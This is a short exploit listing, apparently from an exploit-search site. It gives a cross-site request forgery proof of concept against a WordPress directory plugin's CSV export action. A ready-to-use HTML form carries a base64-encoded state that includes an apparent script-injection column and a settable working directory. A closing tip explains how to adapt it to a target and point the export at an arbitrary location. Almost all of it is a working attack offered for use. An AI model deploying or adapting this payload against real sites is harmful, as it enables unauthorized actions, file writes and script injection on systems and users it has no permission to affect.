Share
## https://sploitus.com/exploit?id=WPEX-ID:FC4CF749-34EF-43B8-A529-5065D698AB81
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpbdp&#45;csv&#45;export" />
      <input type="hidden" name="state" value="eyJzZXR0aW5ncyI6eyJ0YXJnZXQtb3MiOiJtYWNvcyIsImNzdi1maWxlLXNlcGFyYXRvciI6Ilx0IiwiaW1hZ2VzLXNlcGFyYXRvciI6IjsiLCJjYXRlZ29yeS1zZXBhcmF0b3IiOiI7IiwidGVzdC1pbXBvcnQiOmZhbHNlLCJleHBvcnQtaW1hZ2VzIjpmYWxzZSwiaW5jbHVkZS11c2VycyI6IjEiLCJnZW5lcmF0ZS1zZXF1ZW5jZS1pZHMiOmZhbHNlLCJsaXN0aW5nX3N0YXR1cyI6ImFsbCIsImluY2x1ZGUtZXhwaXJhdGlvbi1kYXRlIjoiMSJ9LCJjb2x1bW5zIjpbImxpc3RpbmdfdGl0bGUiLCJsaXN0aW5nX2NhdGVnb3J5Iiwic2hvcnRfZGVzY3JpcHRpb24iLCJkZXNjcmlwdGlvbiIsIndlYnNpdGUiLCJwaG9uZSIsImVtYWlsIiwibGlzdGluZ190YWdzIiwiYWRkcmVzcyIsInppcF9jb2RlIiwic2NyaXB0YWxlcnR4c3MtMXNjcmlwdCIsInVzZXJuYW1lIiwiZmVlX2lkIiwiZXhwaXJlc19vbiJdLCJ3b3JraW5nZGlyIjoiXC92YXJcL3d3d1wvd29yZHByZXNzXC93cC1jb250ZW50XC91cGxvYWRzXC93cGJkcC1jc3YtZXhwb3J0c1wvNjA3MTc0M2M0MDc0MVwvIiwibGlzdGluZ3MiOls2NzVdLCJleHBvcnRlZCI6MCwiZmlsZXNpemUiOjAsImRvbmUiOmZhbHNlfQ==" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The state is base64 encoded and will need to be adapted to the target (the workingdir filed can also be set to an arbitrary existing location)